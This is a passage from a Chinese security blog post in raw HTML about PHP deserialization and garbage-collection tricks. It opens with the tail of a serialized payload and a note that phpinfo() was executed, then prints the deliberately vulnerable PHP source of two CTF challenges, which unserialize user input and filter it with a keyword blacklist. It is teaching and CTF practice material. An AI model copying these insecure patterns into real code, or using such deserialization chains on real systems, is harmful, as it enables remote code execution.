punctuation">;</span><span class="token punctuation">}</span><span class="token punctuation">}</span><span class="token punctuation">}</span>i<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">;</span>i<span class="token punctuation">:</span><span class="token number">0</span><span class="token punctuation">;</span><span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>打一下：</p>
<p><a target="_blank" rel="noopener" href="https://img2023.cnblogs.com/blog/2501811/202303/2501811-20230307132351991-112561532.png"><img src="https://blog-1313934826.cos.ap-chengdu.myqcloud.com/blog-images/202304161642801.png" alt="img"></a></p>
<p>可以看到，成功执行执行phpinfo()。</p>
<h2 id="0x03-侠客日常-四-：挑战群雄"><a href="#0x03-侠客日常-四-：挑战群雄" class="headerlink" title="0x03 侠客日常(四)：挑战群雄"></a>0x03 侠客日常(四)：挑战群雄</h2><p>知道了原理，也经过了实验，想必各位侠客们早已创出了不少独家绝学，迫不及待要一展身手了，因此在这里摆下擂台，设下题目，给各位大侠一展拳脚：</p>
<h3 id="题目一：CTFShow-卷王杯-easy-unserialize"><a href="#题目一：CTFShow-卷王杯-easy-unserialize" class="headerlink" title="题目一：CTFShow[卷王杯]easy unserialize"></a>题目一：CTFShow[卷王杯]easy unserialize</h3><p>php</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token delimiter">&lt;?php</span>
<span class="token comment" spellcheck="true">/**
 * @Author: F10wers_13eiCheng
 * @Date:   2022-02-01 11:25:02
 * @Last Modified by:   F10wers_13eiCheng
 * @Last Modified time: 2022-02-07 15:08:18
 */</span>
<span class="token keyword">include</span><span class="token punctuation">(</span><span class="token string">"./HappyYear.php"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token keyword">class</span> <span class="token class-name">one</span> <span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token variable">$object</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">MeMeMe</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token function">array_walk</span><span class="token punctuation">(</span><span class="token variable">$this</span><span class="token punctuation">,</span> <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token variable">$fn</span><span class="token punctuation">,</span> <span class="token variable">$prev</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$fn</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span> <span class="token operator">===</span> <span class="token string">"Happy_func"</span> <span class="token operator">&amp;&amp;</span> <span class="token variable">$prev</span> <span class="token operator">===</span> <span class="token string">"year_parm"</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token keyword">global</span> <span class="token variable">$talk</span><span class="token punctuation">;</span>
                <span class="token keyword">echo</span> <span class="token string">"$talk"</span><span class="token punctuation">.</span><span class="token string">"&lt;/br>"</span><span class="token punctuation">;</span>
                <span class="token keyword">global</span> <span class="token variable">$flag</span><span class="token punctuation">;</span>
                <span class="token keyword">echo</span> <span class="token variable">$flag</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
        <span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        @<span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">object</span><span class="token operator">-</span><span class="token operator">></span><span class="token function">add</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">object</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">string</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

<span class="token keyword">class</span> <span class="token class-name">second</span> <span class="token punctuation">{</span>
    <span class="token keyword">protected</span> <span class="token variable">$filename</span><span class="token punctuation">;</span>

    <span class="token keyword">protected</span> <span class="token keyword">function</span> <span class="token function">addMe</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">return</span> <span class="token string">"Wow you have sovled"</span><span class="token punctuation">.</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">filename</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__call</span><span class="token punctuation">(</span><span class="token variable">$func</span><span class="token punctuation">,</span> <span class="token variable">$args</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token function">call_user_func</span><span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token variable">$this</span><span class="token punctuation">,</span> <span class="token variable">$func</span><span class="token punctuation">.</span><span class="token string">"Me"</span><span class="token punctuation">]</span><span class="token punctuation">,</span> <span class="token variable">$args</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

<span class="token keyword">class</span> <span class="token class-name">third</span> <span class="token punctuation">{</span>
    <span class="token keyword">private</span> <span class="token variable">$string</span><span class="token punctuation">;</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__construct</span><span class="token punctuation">(</span><span class="token variable">$string</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">string</span> <span class="token operator">=</span> <span class="token variable">$string</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">public</span> <span class="token keyword">function</span> <span class="token function">__get</span><span class="token punctuation">(</span><span class="token variable">$name</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token variable">$var</span> <span class="token operator">=</span> <span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token variable">$name</span><span class="token punctuation">;</span>
        <span class="token variable">$var</span><span class="token punctuation">[</span><span class="token variable">$name</span><span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">"ctfshow"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token variable">$a</span><span class="token operator">=</span><span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token string">'ctfshow'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">throw</span> <span class="token keyword">new</span> <span class="token class-name">Exception</span><span class="token punctuation">(</span><span class="token string">"高一新生报道"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token punctuation">{</span>
    <span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h3 id="题目二：-NSSCTF-prize-p1"><a href="#题目二：-NSSCTF-prize-p1" class="headerlink" title="题目二：[NSSCTF]prize_p1"></a>题目二：[NSSCTF]prize_p1</h3><p>php</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>META</span> <span class="token attr-name">http-equiv</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>Content-Type<span class="token punctuation">"</span></span> <span class="token attr-name">content</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>text/html; charset<span class="token punctuation">=</span>utf-8<span class="token punctuation">"</span></span> <span class="token punctuation">/></span></span></span>
<span class="token delimiter">&lt;?php</span>
<span class="token function">highlight_file</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">class</span> <span class="token class-name">getflag</span> <span class="token punctuation">{</span>
    <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">echo</span> <span class="token function">getenv</span><span class="token punctuation">(</span><span class="token string">"FLAG"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>

<span class="token keyword">class</span> <span class="token class-name">A</span> <span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token variable">$config</span><span class="token punctuation">;</span>
    <span class="token keyword">function</span> <span class="token function">__destruct</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">config</span> <span class="token operator">==</span> <span class="token string">'w'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/get|flag|post|php|filter|base64|rot13|read|data/i'</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">"我知道你想干吗，我的建议是不要那样做。"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
            <span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token string">"./tmp/a.txt"</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span> <span class="token keyword">else</span> <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token variable">$this</span><span class="token operator">-</span><span class="token operator">></span><span class="token property">config</span> <span class="token operator">==</span> <span class="token string">'r'</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
            <span class="token variable">$data</span> <span class="token operator">=</span> <span class="token variable">$_POST</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">;</span>
            <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/get|flag|post|php|filter|base64|rot13|read|data/i'</span><span class="token punctuation">,</span> <span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
                <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">"我知道你想干吗，我的建议是不要那样做。"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
            <span class="token punctuation">}</span>
            <span class="token keyword">echo</span> <span class="token function">file_get_contents</span><span class="token punctuation">(</span><span class="token variable">$data</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span>
<span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">preg_match</span><span class="token punctuation">(</span><span class="token string">'/get|flag|post|php|filter|base64|rot13|read|data/i'</span><span class="token punctuation">,</span> <span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    <span class="token keyword">die</span><span class="token punctuation">(</span><span class="token string">"我知道你想干吗，我的建议是不要那样做。"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token function">unserialize</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token keyword">throw</span> <span class="token keyword">new</span> <span class="token class-name">Error</span><span class="token punctuation">(</span><span class="token string">"那么就从这里开始起航吧"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:1916003479@qq.com">uf9n1x</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://uf9n1x.top/2023/04/16/phpgc-ji-zhi/">https://uf9n1x.top/2023/04/16/phpgc-ji-zhi/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://uf9n1x.top">Uf9n1x's Blog</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/websec/">websec</a><a class="post-meta__tags" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/">反序列化</a><a class="post-meta__tags" href="/tags/phpGC%E6%9C%BA%E5%88%B6/">phpGC机制</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/04/16/python-fan-xu-lie-hua/"><i class="fa fa-chevron-left">  </i><span>python反序列化</span></a></div><div class="next-post pull-right"><a href="/2023/04/16/nei-wang-shen-tou-wu-fan-dan-shell-zi-shi-shou-ji/"><span>反弹shell姿势收集</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer class="footer-bg" style="background-image: url(https://blog-1313934826.cos.ap-chengdu.myqcloud.com/normal-images/psc.png#https://s1.ax1x.com/2023/04/14/p9Sd0ns.png)"><div class="layout" id="footer"><div class="copyright">&copy;2023 By uf9n1x</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="footer_custom_text">hitokoto</div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file-o"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>